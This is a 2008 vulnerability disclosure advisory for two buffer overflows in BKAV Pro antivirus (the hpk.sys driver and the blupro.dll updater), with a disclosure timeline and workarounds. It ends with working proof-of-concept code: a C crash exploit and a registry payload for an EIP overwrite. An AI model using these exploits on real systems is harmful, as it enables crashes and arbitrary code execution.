BLUE MOON SECURITY ADVISORY 2008-06

Title:Multiple buffer overflows in BKAV Pro
Severity:Critical
Reporter:Blue Moon Consulting
Products:BKAV 2006 Pro build 16xx
Fixed in:--

Description

BKAV Pro contains a buffer overflow in its hpk.sys driver. The vulnerability allows a regular user to crash (blue screen of death) Windows.

The hpk.sys driver has a buffer of 512 bytes. When requested via an IOCTL, this driver copies all processes' IDs (4-byte each) into this buffer. However, no length check is performed. If there are more than 128 processes, this buffer's boundary is crossed resulting in a kernel access violation exception which crashes windows.

The vulnerability exists in BKAV Pro edition build 16xx and probably in older builds too.

BKAV Pro also contains a buffer overflow in its auto-update module, blupro.dll. The overflow allows an attacker to run arbitrary code.

The blupro.dll module first tests if it can connect to www.bkav.com.vn. If it cannot, and if fSuDungProxy registry flag is on, it will try to connect to the proxy. In this process, szProxyAddress registry value (which can be 1024-byte long) is copied into a local buffer of 100-byte long, resulting in a buffer overflow. This overflow allows an attacker to point EIP to an arbitrary address, hence arbitrary code execution.

It has not been verified if other editions (Home, Enterprise, Gateway) are also vulnerable.

Workaround

For both vulnerabilities, only run BKAV under Administrator privilege if really necessary. Otherwise, always run BKAV under normal user privilege. However, advanced features such as hidden process killer, rootkit destroyer will not be available under normal user privilege, and auto-update will not use any proxy.

Fix

There is no fix at the moment. Customers are advised to contact the vendor directly for a proper fix. Customers are also advised to conduct a thorough audit/testing on Home, Enterprise and Gateway editions of the same software before deployment.

Disclosure

Blue Moon Consulting adapts RFPolicy v2.0 in notifying vendors.

Initial vendor contact:
 

May 28, 2008: Initial contact sent to bkav@bkav.com.vn

Vendor response:
 

May 29, 2008: Further communication requested to be sent to Nguyen Minh Duc

Further communication:
 

May 29, 2008: Technical details provided to Nguyen Minh Duc

May 30, 2008: Reported bugs considered not exploitable by Nguyen Minh Duc

May 30, 2008: PoC sent to Nguyen Minh Duc

June 03, 2008: Bugs rejected by Nguyen Minh Duc

Public disclosure:
 

June 03, 2008

Exploit code:

Exploit for the first overflow written by Nam T. Nguyen.

/**
 * BKAV Hidden Process Killer Killer (hpk-killer)
 * Copyright 2008 Blue Moon Consulting
 */
#include <stdlib.h>
#include <stdio.h>
#include <process.h>
#include <windows.h>

#define HPK_DEVICE_NAME "\\\\.\\hpk"
#define IOCTL_HPK_QUERY_PROCESSES 0x80106004
#define PROCESS_ID_ARRAY_SIZE 0x200

static void QueryProcesses(void)
{
      HANDLE hFile;
      DWORD dwReturn;
      DWORD buffer[PROCESS_ID_ARRAY_SIZE];

      hFile = CreateFile(HPK_DEVICE_NAME, 1, 1, 0, 3, 0x80, 0);
      if (hFile != INVALID_HANDLE_VALUE)
      {
              printf("Querying processes");
              DeviceIoControl(hFile, IOCTL_HPK_QUERY_PROCESSES, 0, 0, buffer, PROCESS_ID_ARRAY_SIZE, &dwReturn, 0);
              CloseHandle(hFile);
      }
}

int main(int argc, char **argv)
{
      int i, count;

      if (argc < 2)
      {
              printf("Usage: %s <number_of_processes>\n", argv[0]);
              sleep(60 * 1000);
      }
      else
      {
              count = atoi(argv[1]);
              printf("Spawning %d processes...\n", count);
              for (i = 0; i < count; i++)
              {
                      spawnl(P_DETACH, argv[0], argv[0], NULL);
              }
              printf("Killing hpk...\n");
              QueryProcesses();
      }
}

Exploit for the second overflow written by Hieu N. Le.

[HKEY_LOCAL_MACHINE\SOFTWARE\Bkav]
"fTuDongKiemTraPhienBanMoi"=dword:00000001
"fSuDungProxy"=dword:00000001
"nProxyPort"=dword:00001f90
"szProxyAddress"=binary:1111<repeat 11 96 times>1111<EIP>

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.